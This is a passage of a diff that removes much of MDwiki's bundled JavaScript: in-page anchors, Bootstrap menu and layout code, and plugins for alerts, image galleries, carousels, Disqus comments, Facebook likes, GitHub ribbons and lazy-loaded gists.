-            if($heading.prop("tagName") !== 'H2') return;
-
-            var c = $.md.config.tocAnchor;
-            if (c === '')
-                return;
-
-            var $jumpLink = $('<a class="visible-xs visible-sm jumplink" href="#md-page-menu">' + c + '</a>');
-            $jumpLink.click(function(ev) {
-                ev.preventDefault();
-
-                $('body').scrollTop($('#md-page-menu').position().top);
-            });
-
-            if ($heading.parents('#md-menu').length === 0) {
-                $jumpLink.insertAfter($heading);
-            }
-        }
-
-        // adds a page inline anchor to each h1,h2,h3,h4,h5,h6 element
-        // which can be accessed by the headings text
-        $('h1,h2,h3,h4,h5,h6').not('#md-title h1').each (function () {
-            var $heading = $(this);
-            $heading.addClass('md-inpage-anchor');
-            var text = $heading.clone().children('.anchor-highlight').remove().end().text();
-            var href = $.md.util.getInpageAnchorHref(text);
-            addPilcrow($heading, href);
-
-            //add jumplink to table of contents
-            addJumpLinkToTOC($heading);
-        });
-    }
-
-    $.md.scrollToInPageAnchor = function(anchortext) {
-        if (anchortext.startsWith ('#'))
-            anchortext = anchortext.substring (1, anchortext.length);
-        // we match case insensitive
-        var doBreak = false;
-        $('.md-inpage-anchor').each (function () {
-            if (doBreak) { return; }
-            var $this = $(this);
-            // don't use the text of any subnode
-            var text = $this.toptext();
-            var match = $.md.util.getInpageAnchorText (text);
-            if (anchortext === match) {
-                this.scrollIntoView (true);
-                var navbar_offset = $('.navbar-collapse').height() + 5;
-                window.scrollBy(0, -navbar_offset + 5);
-                doBreak = true;
-            }
-        });
-    };
-
-}(jQuery));
-
-(function($) {
-    'use strict';
-    // call the gimmick
-    $.mdbootstrap = function (method){
-        if ($.mdbootstrap.publicMethods[method]) {
-            return $.mdbootstrap.publicMethods[method].apply(this, Array.prototype.slice.call(arguments, 1));
-        } else {
-            $.error('Method ' + method + ' does not exist on jquery.mdbootstrap');
-        }
-    };
-    // simple wrapper around $().bind
-    $.mdbootstrap.events = [];
-    $.mdbootstrap.bind =  function (ev, func) {
-        $(document).bind (ev, func);
-        $.mdbootstrap.events.push (ev);
-    };
-    $.mdbootstrap.trigger = function (ev) {
-        $(document).trigger (ev);
-    };
-
-    var navStyle = '';
-
-    // PUBLIC API functions that are exposed
-    var publicMethods = {
-        bootstrapify: function () {
-            createPageSkeleton();
-            buildMenu ();
-            changeHeading();
-            replaceImageParagraphs();
-
-            $('table').addClass('table').addClass('table-bordered');
-            //pullRightBumper ();
-
-            // remove the margin for headings h1 and h2 that are the first
-            // on page
-            //if (navStyle == "sub" || (navStyle == "top" && $('#md-title').text ().trim ().length === 0))
-            //    $(".md-first-heading").css ("margin-top", "0");
-
-            // external content should run after gimmicks were run
-            $.md.stage('pregimmick').subscribe(function(done) {
-                if ($.md.config.useSideMenu !== false) {
-                    createPageContentMenu();
-                }
-                addFooter();
-                addAdditionalFooterText();
-                done();
-            });
-            $.md.stage('postgimmick').subscribe(function(done) {
-                adjustExternalContent();
-                highlightActiveLink();
-
-                done();
-            });
-        }
-    };
-    // register the public API functions
-    $.mdbootstrap.publicMethods = $.extend ({}, $.mdbootstrap.publicMethods, publicMethods);
-
-    // PRIVATE FUNCTIONS:
-
-    function buildTopNav() {
-        // replace with the navbar skeleton
-        if ($('#md-menu').length <= 0) {
-            return;
-        }
-        navStyle = 'top';
-        var $menuContent = $('#md-menu').children();
-
-        // $('#md-menu').addClass ('navbar navbar-default navbar-fixed-top');
-        // var menusrc = '';
-        // menusrc += '<div id="md-menu-inner" class="container">';
-        // menusrc += '<ul id="md-menu-ul" class="nav navbar-nav">';
-        // menusrc += '</ul></div>';
-
-        var navbar = '';
-        navbar += '<div id="md-main-navbar" class="navbar navbar-default navbar-fixed-top" role="navigation">';
-        navbar +=   '<div class="navbar-header">';
-        navbar +=     '<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">';
-        navbar +=       '<span class="sr-only">Toggle navigation</span>';
-        navbar +=       '<span class="icon-bar"></span>';
-        navbar +=       '<span class="icon-bar"></span>';
-        navbar +=       '<span class="icon-bar"></span>';
-        navbar +=     '</button>';
-        navbar +=     '<a class="navbar-brand" href="#"></a>';
-        navbar +=   '</div>';
-
-        navbar +=   '<div class="collapse navbar-collapse navbar-ex1-collapse">';
-        navbar +=     '<ul class="nav navbar-nav" />';
-        navbar +=     '<ul class="nav navbar-nav navbar-right" />';
-        navbar +=   '</div>';
-        navbar += '</div>';
-        var $navbar = $(navbar);
-
-        $navbar.appendTo('#md-menu');
-        // .eq(0) becase we dont want navbar-right to be appended to
-        $('#md-menu ul.nav').eq(0).append($menuContent);
-
-        // the menu should be the first element in the body
-        $('#md-menu').prependTo ('#md-all');
-
-        var brand_text = $('#md-menu h1').toptext();
-        $('#md-menu h1').remove();
-        $('a.navbar-brand').text(brand_text);
-
-        // initial offset
-        $('#md-body').css('margin-top', '70px');
-        $.md.stage('pregimmick').subscribe(function (done) {
-            check_offset_to_navbar();
-            done();
-        });
-    }
-    // the navbar has different height depending on theme, number of navbar entries,
-    // and window/device width. Therefore recalculate on start and upon window resize
-    function set_offset_to_navbar () {
-        var height = $('#md-main-navbar').height() + 10;
-        $('#md-body').css('margin-top', height + 'px');
-    }
-    function check_offset_to_navbar () {
-        // HACK this is VERY UGLY. When an external theme is used, we don't know when the
-        // css style will be finished loading - and we can only correctly calculate
-        // the height AFTER it has completely loaded.
-        var navbar_height = 0;
-
-        var dfd1 = $.md.util.repeatUntil(40, function() {
-            navbar_height = $('#md-main-navbar').height();
-            return (navbar_height > 35) && (navbar_height < 481);
-        }, 25);
-
-        dfd1.done(function () {
-            navbar_height = $('#md-main-navbar').height();
-            set_offset_to_navbar();
-            // now bootstrap changes this maybe after a while, again watch for changes
-            var dfd2 = $.md.util.repeatUntil(20, function () {
-                return navbar_height !== $('#md-main-navbar').height();
-            }, 25);
-            dfd2.done(function() {
-                // it changed, so we need to change it again
-                set_offset_to_navbar();
-            });
-            // and finally, for real slow computers, make sure it is changed if changin very late
-            $.md.util.wait(2000).done(function () {
-                set_offset_to_navbar();
-            });
-        });
-    }
-    function buildSubNav() {
-        // replace with the navbar skeleton
-        /* BROKEN CODE
-        if ($('#md-menu').length <= 0) {
-            return;
-        }
-        navStyle = 'sub';
-        var $menuContent = $('#md-menu').html ();
-
-        var menusrc = '';
-        menusrc += '<div id="md-menu-inner" class="subnav">';
-        menusrc += '<ul id="md-menu-ul" class="nav nav-pills">';
-        menusrc += $menuContent;
-        menusrc += '</ul></div>';
-        $('#md-menu').empty();
-        $('#md-menu').wrapInner($(menusrc));
-        $('#md-menu').addClass ('col-md-12');
-
-        $('#md-menu-container').insertAfter ($('#md-title-container'));
-        */
-    }
-
-    function buildMenu () {
-        if ($('#md-menu a').length === 0) {
-            return;
-        }
-        var h = $('#md-menu');
-
-        // make toplevel <a> a dropdown
-        h.find('> a[href=""]')
-            .attr('data-toggle', 'dropdown')
-            .addClass('dropdown-toggle')
-            .attr('href','')
-            .append('<b class="caret"/>');
-        h.find('ul').addClass('dropdown-menu');
-        h.find('ul li').addClass('dropdown');
-
-        // replace hr with dividers
-        $('#md-menu hr').each(function(i,e) {
-            var hr = $(e);
-            var prev = hr.prev();
-            var next = hr.next();
-            if (prev.is('ul') && prev.length >= 0) {
-                prev.append($('<li class="divider"/>'));
-                hr.remove();
-                if (next.is('ul')) {
-                    next.find('li').appendTo(prev);
-                    next.remove();
-                }
-                // next ul should now be empty
-            }
-            return;
-        });
-
-        // remove empty uls
-        $('#md-menu ul').each(function(i,e) {
-            var ul = $(e);
-            if (ul.find('li').length === 0) {
-                ul.remove();
-            }
-        });
-
-        $('#md-menu hr').replaceWith($('<li class="divider-vertical"/>'));
-
-
-        // wrap the toplevel links in <li>
-        $('#md-menu > a').wrap('<li />');
-        $('#md-menu ul').each(function(i,e) {
-            var ul = $(e);
-            ul.appendTo(ul.prev());
-            ul.parent('li').addClass('dropdown');
-        });
-
-        // submenu headers
-        $('#md-menu li.dropdown').find('h1, h2, h3').each(function(i,e) {
-            var $e = $(e);
-            var text = $e.toptext();
-            var header = $('<li class="dropdown-header" />');
-            header.text(text);
-            $e.replaceWith(header);
-        });
-
-        // call the user specifed menu function
-        buildTopNav();
-    }
-    function isVisibleInViewport(e) {
-        var el = $(e);
-        var top = $(window).scrollTop();
-        var bottom = top + $(window).height();
-
-        var eltop = el.offset().top;
-        var elbottom = eltop + el.height();
-
-        return (elbottom <= bottom) && (eltop >= top);
-    }
-
-    function createPageContentMenu () {
-
-        // assemble the menu
-        var $headings = $('#md-content').find('h2').clone();
-        // we dont want the text of any child nodes
-        $headings.children().remove();
-
-        if ($headings.length <= 1) {
-            return;
-        }
-
-        $('#md-content').removeClass ('col-md-12');
-        $('#md-content').addClass ('col-md-9');
-        $('#md-content-row').prepend('<div class="col-md-3" id="md-left-column"/>');
-
-        var recalc_width = function () {
-            // if the page menu is affixed, it is not a child of the
-            // <md-left-column> anymore and therefore does not inherit
-            // its width. On every resize, change the class accordingly
-            var width_left_column = $('#md-left-column').css('width');
-            $('#md-page-menu').css('width', width_left_column);
-        };
-
-        $(window).scroll(function() {
-            recalc_width($('#md-page-menu'));
-            var $first;
-            $('*.md-inpage-anchor').each(function(i,e) {
-                if ($first === undefined) {
-                    var h = $(e);
-                    if (isVisibleInViewport(h)) {
-                        $first = h;
-                    }
-                }
-            });
-            // highlight in the right menu
-            $('#md-page-menu a').each(function(i,e) {
-                var $a = $(e);
-                if ($first && $a.toptext() === $first.toptext()) {
-                    $('#md-page-menu a.active').removeClass('active');
-                    //$a.parent('a').addClass('active');
-                    $a.addClass('active');
-                }
-            });
-        });
-
-
-        var affixDiv = $('<div id="md-page-menu" />');
-
-        //var top_spacing = $('#md-menu').height() + 15;
-        var top_spacing = 70;
-        affixDiv.affix({
-            //offset: affix.position() - 50,
-            offset: 130
-        });
-        affixDiv.css('top', top_spacing);
-        //affix.css('top','-250px');
-
-        var $pannel = $('<div class="panel panel-default"><ul class="list-group"/></div>');
-        var $ul = $pannel.find("ul");
-        affixDiv.append($pannel);
-
-        $headings.each(function(i,e) {
-            var $heading = $(e);
-            var $li = $('<li class="list-group-item" />');
-            var $a = $('<a />');
-            $a.attr('href', $.md.util.getInpageAnchorHref($heading.toptext()));
-            $a.click(function(ev) {
-                ev.preventDefault();
-
-                var $this = $(this);
-                var anchortext = $.md.util.getInpageAnchorText($this.toptext());
-                $.md.scrollToInPageAnchor(anchortext);
-            });
-            $a.text($heading.toptext());
-            $li.append($a);
-            $ul.append($li);
-        });
-
-        $(window).resize(function () {
-            recalc_width($('#md-page-menu'));
-            check_offset_to_navbar();
-        });
-        $.md.stage('postgimmick').subscribe(function (done) {
-            // recalc_width();
-            done();
-        });
-
-        //menu.css('width','100%');
-        $('#md-left-column').append(affixDiv);
-
-    }
-
-    function createPageSkeleton() {
-
-        $('#md-title').wrap('<div class="container" id="md-title-container"/>');
-        $('#md-title').wrap('<div class="row" id="md-title-row"/>');
-
-        $('#md-menu').wrap('<div class="container" id="md-menu-container"/>');
-        $('#md-menu').wrap('<div class="row" id="md-menu-row"/>');
-
-        $('#md-content').wrap('<div class="container" id="md-content-container"/>');
-        $('#md-content').wrap('<div class="row" id="md-content-row"/>');
-
-        $('#md-body').wrap('<div class="container" id="md-body-container"/>');
-        $('#md-body').wrap('<div class="row" id="md-body-row"/>');
-
-        $('#md-title').addClass('col-md-12');
-        $('#md-content').addClass('col-md-12');
-
-    }
-    function pullRightBumper (){
- /*     $("span.bumper").each (function () {
-			$this = $(this);
-			$this.prev().addClass ("pull-right");
-		});
-		$('span.bumper').addClass ('pull-right');
-*/
-    }
-
-    function changeHeading() {
-
-        // HEADING
-        var jumbo = $('<div class="page-header" />');
-        $('#md-title').wrapInner(jumbo);
-    }
-
-    function highlightActiveLink () {
-        // when no menu is used, return
-        if ($('#md-menu').find ('li').length === 0) {
-            return;
-        }
-		var filename = window.location.hash;
-
-		if (filename.length === 0) {
-            filename = '#!index.md';
-        }
-		var selector = 'li:has(a[href="' + filename + '"])';
-		$('#md-menu').find (selector).addClass ('active');
-    }
-
-    // replace all <p> around images with a <div class="thumbnail" >
-    function replaceImageParagraphs() {
-
-        // only select those paragraphs that have images in them
-        var $pars = $('p img').parents('p');
-        $pars.each(function() {
-            var $p = $(this);
-            var $images = $(this).find('img')
-                .filter(function() {
-                    // only select those images that have no parent anchor
-                    return $(this).parents('a').length === 0;
-                })
-                // add those anchors including images
-                .add($(this).find ('img'))
-                .addClass('img-responsive')
-                .addClass('img-thumbnail');
-
-            // create a new url group at the fron of the paragraph
-            //$p.prepend($('<ul class="thumbnails" />'));
-            // move the images to the newly created ul
-            //$p.find('ul').eq(0).append($images);
-
-            // wrap each image with a <li> that limits their space
-            // the number of images in a paragraphs determines thei width / span
-
-            // if the image is a link, wrap around the link to avoid
-            function wrapImage ($imgages, wrapElement) {
-                return $images.each(function (i, img) {
-                    var $img = $(img);
-                    var $parent_img = $img.parent('a');
-                    if ($parent_img.length > 0)
-                        $parent_img.wrap(wrapElement);
-                    else
-                        $img.wrap(wrapElement);
-                });
-            }
-
-            if ($p.hasClass ('md-floatenv')) {
-                if ($images.length === 1) {
-                    wrapImage($images, '<div class="col-sm-8" />');
-                } else if ($images.length === 2) {
-                    wrapImage($images, '<div class="col-sm-4" />');
-                } else {
-                    wrapImage($images, '<div class="col-sm-2" />');
-                }
-            } else {
-
-                // non-float => images are on their own single paragraph, make em larger
-                // but remember, our image resizing will make them only as large as they are
-                // but do no upscaling
-                // TODO replace by calculation
-
-                if ($images.length === 1) {
-                    wrapImage($images, '<div class="col-sm-12" />');
-                } else if ($images.length === 2) {
-                    wrapImage($images, '<div class="col-sm-6" />');
-                } else if ($images.length === 3) {
-                    wrapImage($images, '<div class="col-sm-4" />');
-                } else if ($images.length === 4) {
-                    wrapImage($images, '<div class="col-sm-3" />');
-                } else {
-                    wrapImage($images, '<div class="col-sm-2" />');
-                }
-            }
-            $p.addClass('row');
-            // finally, every img gets its own wrapping thumbnail div
-            //$images.wrap('<div class="thumbnail" />');
-        });
-
-        // apply float to the ul thumbnails
-        //$('.md-floatenv.md-float-left ul').addClass ('pull-left');
-        //$('.md-floatenv.md-float-right ul').addClass ('pull-right');
-    }
-
-    function adjustExternalContent() {
-        // external content are usually iframes or divs that are integrated
-        // by gimmicks
-        // example: youtube iframes, google maps div canvas
-        // all external content are in the md-external class
-
-        $('iframe.md-external').not ('.md-external-nowidth')
-            .attr('width', '450')
-            .css ('width', '450px');
-
-        $('iframe.md-external').not ('.md-external-noheight')
-            .attr('height', '280')
-            .css ('height', '280px');
-
-        // make it appear like an image thumbnal
-        //$('.md-external').addClass('img-thumbnail');
-
-        //.wrap($("<ul class='thumbnails' />")).wrap($("<li class='col-md-6' />"));
-        $('div.md-external').not('.md-external-noheight')
-            .css('height', '280px');
-        $('div.md-external').not('.md-external-nowidth')
-            .css('width', '450px');
-
-        // // make it appear like an image thumbnal
-        // $("div.md-external").addClass("thumbnail").wrap($("<ul class='thumbnails' />")).wrap($("<li class='col-md-10' />"));
-
-        // $("div.md-external-large").css('width', "700px")
-    }
-
-    // note: the footer is part of the GPLv3 legal information
-    // and may not be removed or hidden to comply with licensing conditions.
-    function addFooter() {
-        var navbar = '';
-        navbar += '<hr><div class="scontainer">';
-        navbar +=   '<div class="pull-right md-copyright-footer"> ';
-        navbar +=     '<span id="md-footer-additional"></span>';
-        navbar +=     'Website generated with <a href="http://www.mdwiki.info">MDwiki</a> ';
-        navbar +=     '&copy; Timo D&ouml;rr and contributors. ';
-        navbar +=   '</div>';
-        navbar += '</div>';
-        var $navbar = $(navbar);
-        $navbar.css('position', 'relative');
-        $navbar.css('margin-top', '1em');
-        $('#md-all').append ($navbar);
-    }
-
-    function addAdditionalFooterText () {
-        var text = $.md.config.additionalFooterText;
-        if (text) {
-            $('.md-copyright-footer #md-footer-additional').html(text);
-        }
-    }
-}(jQuery));
-
-(function($) {
-    $.gimmicks = $.fn.gimmicks = function(method) {
-        if (method === undefined) {
-            return;
-        }
-        // call the gimmick
-        if ($.fn.gimmicks.methods[method]) {
-            return $.fn.gimmicks.methods[method].apply(this, Array.prototype.slice.call(arguments, 1));
-        } else {
-            $.error('Gimmick ' + method + ' does not exist on jQuery.gimmicks');
-        }
-    };
-
-    // TODO underscores _ in Markdown links are not allowed! bug in our MD imlemenation
-
-
-}(jQuery));
-
-(function($) {
-    //'use strict';
-    var alertsGimmick = {
-        name: 'alerts',
-        // TODO
-        //version: $.md.version,
-        load: function() {
-            $.md.stage('bootstrap').subscribe(function(done) {
-                createAlerts();
-                done();
-            });
-        }
-    };
-    $.md.registerGimmick(alertsGimmick);
-
-    // takes a standard <img> tag and adds a hyperlink to the image source
-    // needed since we scale down images via css and want them to be accessible
-    // in original format
-    function createAlerts() {
-        var matches = $(select_paragraphs());
-        matches.each(function() {
-            var $p = $(this.p);
-            var type = this.alertType;
-            $p.addClass('alert');
-
-            if (type === 'note') {
-                $p.addClass('alert-info');
-            } else if (type === 'hint') {
-                $p.addClass('alert-success');
-            } else if (type === 'warning') {
-                $p.addClass('alert-warning');
-            }
-        });
-    }
-
-    // picks out the paragraphs that start with a trigger word
-    function select_paragraphs() {
-        var note = ['note', 'beachte' ];
-        var warning = [ 'achtung', 'attention', 'warnung', 'warning', 'atención', 'guarda', 'advertimiento' ];
-        var hint = ['hint', 'tipp', 'tip', 'hinweis'];
-        var exp = note.concat(warning);
-        exp = exp.concat(hint);
-        var matches = [];
-
-        $('p').filter (function () {
-            var $par = $(this);
-            // check against each expression
-            $(exp).each (function (i,trigger) {
-                var txt = $par.text().toLowerCase ();
-                // we match only paragrachps in which the 'trigger' expression
-                // is follow by a ! or :
-                var re = new RegExp (trigger + '(:|!)+.*','i');
-                var alertType = 'none';
-                if (txt.match (re) !== null) {
-                    if ($.inArray(trigger, note) >= 0) {
-                        alertType = 'note';
-                    } else if ($.inArray(trigger, warning) >= 0) {
-                        alertType = 'warning';
-                    } else if ($.inArray(trigger, hint) >= 0) {
-                        alertType = 'hint';
-                    }
-                    matches.push ({
-                        p: $par,
-                        alertType: alertType
-                    });
-                }
-            });
-        });
-        return matches;
-    }
-}(jQuery));
-
-(function($) {
-    // makes trouble, find out why
-    //'use strict';
-    var colorboxGimmick = {
-        name: 'colorbox',
-        load: function() {
-            $.md.stage('gimmick').subscribe(function(done) {
-                $.gimmicks('colorbox');
-                done();
-            });
-        }
-    };
-    $.md.registerGimmick(colorboxGimmick);
-
-    var methods = {
-        // takes a standard <img> tag and adds a hyperlink to the image source
-        // needed since we scale down images via css and want them to be accessible
-        // in original format
-        colorbox: function() {
-            var $image_groups;
-            if (!(this instanceof jQuery)) {
-                // select the image groups of the page
-                $image_groups = $('.md-image-group');
-            } else {
-                $image_groups = $(this);
-            }
-            // operate on md-image-group, which holds one
-            // or more images that are to be colorbox'ed
-            var counter = 0;
-            return $image_groups.each(function() {
-                var $this = $(this);
-
-                // each group requires a unique name
-                var gal_group = 'gallery-group-' + (counter++);
-
-                // create a hyperlink around the image
-                $this.find('a.md-image-selfref img')
-                // filter out images that already are a hyperlink
-                // (so won't be part of the gallery)
-
-                // apply colorbox on their parent anchors
-                .parents('a').colorbox({
-                    rel: gal_group,
-                    opacity: 0.75,
-                    slideshow: true,
-                    maxWidth: '95%',
-                    maxHeight: '95%',
-                    scalePhotos: true,
-                    photo: true,
-                    slideshowAuto: false
-                });
-            });
-        }
-    };
-    $.gimmicks.methods = $.extend({}, $.fn.gimmicks.methods, methods);
-}(jQuery));
-
-(function($) {
-    'use strict';
-
-    var themeChooserGimmick = {
-        name: 'Themes',
-        version: $.md.version,
-        once: function() {
-            $.md.linkGimmick(this, 'carousel', carousel);
-        }
-    };
-    $.md.registerGimmick(themeChooserGimmick);
-
-    function carousel($link, opt, href) {
-
-        var $c = $('<div id="myCarousel" class="carousel slide"></div>');
-        var $d = $('<div class="carousel-inner"/>');
-        $c.append('<ol class="carousel-indicators" />');
-
-        var imageUrls = [];
-        var i = 0;
-        $.each(href.split(','), function(i, e) {
-            imageUrls.push($.trim(e));
-            $c.find('ol').append('<li data-target="#myCarousel" data-slide-to="' + i + '" class="active" /');
-            var div;
-            if (i === 0) {
-                div = ('<div class="active item"/>');
-            } else {
-                div = ('<div class="item"/>');
-            }
-            $d.append($(div).append('<img src="' + e + '"/>'));
-        });
-        $c.append($d);
-        $c.append('<a class="carousel-control left" href="#myCarousel" data-slide="prev">&lsaquo;</a>');
-        $c.append('<a class="carousel-control right" href="#myCarousel" data-slide="next">&rsaquo;</a>');
-        $link.replaceWith($c);
-    }
-}(jQuery));
-
-(function($) {
-    var disqusGimmick = {
-        name: 'disqus',
-        version: $.md.version,
-        once: function() {
-            $.md.linkGimmick(this, 'disqus', disqus);
-        }
-    };
-    $.md.registerGimmick(disqusGimmick);
-
-    var alreadyDone = false;
-    var disqus = function($links, opt, text) {
-        var default_options = {
-            identifier: ''
-        };
-        var options = $.extend (default_options, opt);
-        var disqus_div = $('<div id="disqus_thread" class="md-external md-external-noheight md-external-nowidth" >' + '<a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a></div>');
-        disqus_div.css ('margin-top', '2em');
-        return $links.each(function(i,link) {
-            if (alreadyDone === true) {
-                return;
-            }
-            alreadyDone = true;
-
-            var $link = $(link);
-            var disqus_shortname = $link.attr('href');
-
-            if (disqus_shortname !== undefined && disqus_shortname.length > 0) {
-                // insert the div
-                $link.remove ();
-                // since disqus need lot of height, always but it on the bottom of the page
-                $('#md-content').append(disqus_div);
-                if ($('#disqus_thread').length > 0) {
-                    (function() {
-                        // all disqus_ variables are used by the script, they
-                        // change the config behavious.
-                        // see: http://help.disqus.com/customer/portal/articles/472098-javascript-configuration-variables
-
-                        // set to 1 if developing, or the site is password protected or not
-                        // publicaly accessible
-                        //var disqus_developer = 1;
-
-                        // by default, disqus will use the current url to determine a thread
-                        // since we might have different parameters present, we remove them
-                        // disqus_* vars HAVE TO BE IN GLOBAL SCOPE
-                        var disqus_url = window.location.href;
-                        var disqus_identifier;
-                        if (options.identifier.length > 0) {
-                            disqus_identifier = options.identifier;
-                        } else {
-                            disqus_identifier = disqus_url;
-                        }
-
-                        // dynamically load the disqus script
-                        var dsq = document.createElement('script');
-                        dsq.type = 'text/javascript';
-                        dsq.async = true;
-                        dsq.src = 'http://' + disqus_shortname + '.disqus.com/embed.js';
-                        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
-                    })();
-                }
-            }
-        });
-    };
-}(jQuery));
-
-(function($) {
-    var language = window.navigator.userLanguage || window.navigator.language;
-    var code = language + "_" + language.toUpperCase();
-    var fbRootDiv = $('<div id="fb-root" />');
-    var fbScriptHref = $.md.prepareLink ('connect.facebook.net/' + code + '/all.js#xfbml=1', { forceHTTP: true });
-    var fbscript ='(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "' + fbScriptHref + '"; fjs.parentNode.insertBefore(js, fjs);}(document, "script", "facebook-jssdk"));';
-
-    var facebookLikeGimmick = {
-        name: 'FacebookLike',
-        version: $.md.version,
-        once: function() {
-            $.md.linkGimmick(this, 'facebooklike', facebooklike);
-            $.md.registerScript(this, fbscript, {
-                license: 'APACHE2',
-                loadstage: 'postgimmick',
-                finishstage: 'all_ready'
-            });
-        }
-    };
-    $.md.registerGimmick(facebookLikeGimmick);
-
-    function facebooklike($link, opt, text) {
-        var default_options = {
-            layout: 'standard',
-            showfaces: true
-        };
-        var options = $.extend ({}, default_options, opt);
-        // Due to a bug, we can have underscores _ in a markdown link
-        // so we insert the underscores needed by facebook here
-        if (options.layout === 'boxcount') {
-            options.layout = 'box_count';
-        }
-        if (options.layout === 'buttoncount') {
-            options.layout = 'button_count';
-        }
-
-        return $link.each(function(i,e) {
-            var $this = $(e);
-            var href = $this.attr('href');
-            $('body').append(fbRootDiv);
-
-            var $fb_div = $('<div class="fb-like" data-send="false" data-width="450"></div>');
-            $fb_div.attr ('data-href', href);
-            $fb_div.attr ('data-layout', options.layout);
-            $fb_div.attr ('data-show-faces', options.showfaces);
-
-            $this.replaceWith ($fb_div);
-        });
-    }
-}(jQuery));
-
-(function($) {
-    'use strict';
-    var forkmeongithubGimmick = {
-        name: 'forkmeongithub',
-        version: $.md.version,
-        once: function() {
-            $.md.linkGimmick(this, 'forkmeongithub', forkmeongithub);
-        }
-    };
-    $.md.registerGimmick(forkmeongithubGimmick);
-
-    function forkmeongithub($links, opt, text) {
-        return $links.each (function (i, link){
-            var $link = $(link);
-            // default options
-            var default_options = {
-                color: 'red',
-                position : 'right'
-            };
-            var options = $.extend ({}, default_options, opt);
-            var color = options.color;
-            var pos = options.position;
-
-            // the filename for the ribbon
-            // see: https://github.com/blog/273-github-ribbons
-            var base_href = 'https://s3.amazonaws.com/github/ribbons/forkme_';
-
-            if (color === 'red') {
-                base_href += pos + '_red_aa0000.png';
-            }
-            if (color === 'green') {
-                base_href += pos + '_green_007200.png';
-            }
-            if (color === 'darkblue') {
-                base_href += pos + '_darkblue_121621.png';
-            }
-            if (color === 'orange') {
-                base_href += pos + '_orange_ff7600.png';
-            }
-            if (color === 'white') {
-                base_href += pos + '_white_ffffff.png';
-            }
-            if (color === 'gray') {
-                base_href += pos + '_gray_6d6d6d.png';
-            }
-
-            var href = $link.attr('href');
-    //                var body_pos_top = $('#md-body').offset ().top;
-            var body_pos_top = 0;
-            var github_link = $('<a class="forkmeongithub" href="'+ href +'"><img style="position: absolute; top: ' + body_pos_top + ';'+pos+': 0; border: 0;" src="'+base_href+'" alt="Fork me on GitHub"></a>');
-            // to avoid interfering with other div / scripts, we remove the link and prepend it to the body
-            // the fork me ribbon is positioned absolute anyways
-            $('body').prepend (github_link);
-            github_link.find('img').css ('z-index', '2000');
-            $link.remove();
-        });
-    }
-
-}(jQuery));
-
-(function($){
-    'use strict';
-    var gistGimmick = {
-        name: 'gist',
-        once: function() {
-            $.md.linkGimmick(this, 'gist', gist);
-        }
-    };
-    $.md.registerGimmick(gistGimmick);
-
-    function gist($links, opt, href) {
-        $().lazygist('init');
-        return $links.each(function(i,link) {
-            var $link = $(link);
-            var gistDiv = $('<div class="gist_here" data-id="' + href + '" />');
-            $link.replaceWith(gistDiv);
-            gistDiv.lazygist({
-                // we dont want a specific file so modify the url template
-                url_template: 'https://gist.github.com/{id}.js?'
-            });
-        });
-    }
-}(jQuery));
-
-
- /**
- * Lazygist v0.2pre
- *
- * a jQuery plugin that will lazy load your gists.
- *
- * since jQuery 1.7.2
- * https://github.com/tammo/jquery-lazy-gist
- *
- * Copyright, Tammo Pape
- * http://tammopape.de
- *
- * Licensed under the MIT license.
- */
-
-(function( $, window, document, undefined ){
-    "use strict";
-
-    //
-    // note:
-    // this plugin is not stateful
-    // and will not communicate with own instances at different elements
-    //
-
-    var pluginName = "lazygist",
-    version = "0.2pre",
-
-    defaults = {
-        // adding the ?file parameter to choose a file
-        'url_template': 'https://gist.github.com/{id}.js?file={file}',
-
-        // if these are strings, the attributes will be read from the element
-        'id': 'data-id',
-        'file': 'data-file'
-    },
-
-    options,
-
-    // will be replaced
-    /*jshint -W060 */
-    originwrite = document.write,
-
-    // stylesheet urls found in document.write calls
-    // they are cached to write them once to the document,
-    // not three times for three gists
-    stylesheets = [],
-
-    // cache gist-ids to know which are already appended to the dom
-    ids_dom = [],
-
-    // remember gist-ids if their javascript is already loaded
-    ids_ajax = [],
-
-    methods = {
-
-        /**
-         * Standard init function
-         * No magic here
-         */
-        init : function( options_input ){
-
-            // default options are default
-            options = $.extend({}, defaults, options_input);
-
-            // can be reset
-            /*jshint -W061 */
-            document.write = _write;
-
-            $.each(options, function(index, value) {
-                if(typeof value !== 'string') {
-                    throw new TypeError(value + ' (' + (typeof value) + ') is not a string');
-                }
-            });
-
-            return this.lazygist('load');
-        },
-
-        /**
-         * Load the gists
-         */
-        load : function() {
-            // (1) iterate over gist anchors
-            // (2) append the gist-html through the new document.write func (see _write)
-
-            // (1)
-            return this.filter('[' + options.id + ']').each(function(){
-
-                var id = $(this).attr(options.id),
-                    file = $(this).attr(options.file),
-                    src;
-
-                if( id !== undefined ) {
-
-                    if( $.inArray(id, ids_ajax) !== -1 ) {
-                        // just do nothin, if gist is already ajaxed
-                        return;
-                    }
-
-                    ids_ajax.push(id);
-
-                    src = options.url_template.replace(/\{id\}/g, id).replace(/\{file\}/g, file);
-
-                    // (2) this will trigger our _write function
-                    $.getScript(src, function() {
-                    });
-                }
-            });
-        },
-
-        /**
-         * Just reset the write function
-         */
-        reset_write: function() {
-            document.write = originwrite;
-
-            return this;
-        }
-    };
-
-    /**
-     * private special document.write function
-     *
-     * Filters the css file from github.com to add it to the head - once -
-     *
-     * It has a fallback to keep flexibility with other scripts as high as possible
-     * (create a ticket if it messes things up!)
-     *
-     * Keep in mind, that a call to this function happens after
-     * an ajax call by jQuery. One *cannot* know which gist-anchor
-     * to use. You can only read the id from the content.
-     */
-    function _write( content ) {
-
-        var expression, // for regexp results
-            href, // from the url
-            id; // from the content
-
-        if( content.indexOf( 'rel="stylesheet"' ) !== -1 ) {
-            href = $(content).attr('href');
-
-            // check if stylesheet is already inserted
-            if ( $.inArray(href, stylesheets) === -1 ) {
-
-                $('head').append(content);
-                stylesheets.push(href);
-            }
-
-        } else if( content.indexOf( 'id="gist' ) !== -1 ) {
-            expression = /gist([\d]{1,})/g.exec(content);
-            id = expression[1];
-
-            if( id !== undefined ) {
-
-                // test if id is already loaded
-                if( $.inArray(id, ids_dom) !== -1 ) {
-                    // just do nothin, if gist is already attached to the dom
-                    return;
-                }
-
-                ids_dom.push(id);
-
-                $('.gist_here[data-id=' + id + ']').append(content);
-            }
-        } else {
